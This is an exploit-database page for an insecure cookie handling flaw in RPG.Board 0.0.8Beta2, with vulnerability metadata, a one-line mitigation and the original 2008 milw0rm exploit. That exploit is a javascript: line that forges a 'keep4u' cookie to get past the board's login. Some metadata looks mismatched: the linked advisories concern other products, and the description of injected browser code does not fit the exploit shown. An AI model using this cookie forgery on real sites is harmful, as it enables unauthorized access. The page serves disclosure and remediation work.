header-logo
Suggest Exploit
vendor:
RPG.Board
by:
Stack
7.5
CVSS
HIGH
Insecure Cookie Handling
614
CWE
Product Name: RPG.Board
Affected Version From: 0.0.8Beta2
Affected Version To: 0.0.8Beta2
Patch Exists: YES
Related CWE: CVE-2008-4456
CPE: a:rpg_board:rpg.board
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1289/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0110/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1461/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2008-4456/https://www.rapid7.com/db/vulnerabilities/apple-osx-mysql-cve-2008-4456/https://www.rapid7.com/db/vulnerabilities/suse-cve-2008-4456/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2008-4456/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

RPG.Board <= 0.0.8Beta2 Insecure Cookie Handling Vulnerability

RPG.Board is vulnerable to insecure cookie handling. An attacker can inject malicious code into the cookie and execute it on the victim's browser.

Mitigation:

Upgrade to the latest version of RPG.Board.
Source

Exploit-DB raw data:

###############################################################################################
[+] RPG.Board <= 0.0.8Beta2 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack             
[+] Greetz : All my freind            
################################################################################################
Exploit:
javascript:document.cookie = "keep4u=l5_ZrX8; path=/;";

# milw0rm.com [2008-09-27]

Navigation

Suggest Exploit

Services By CQR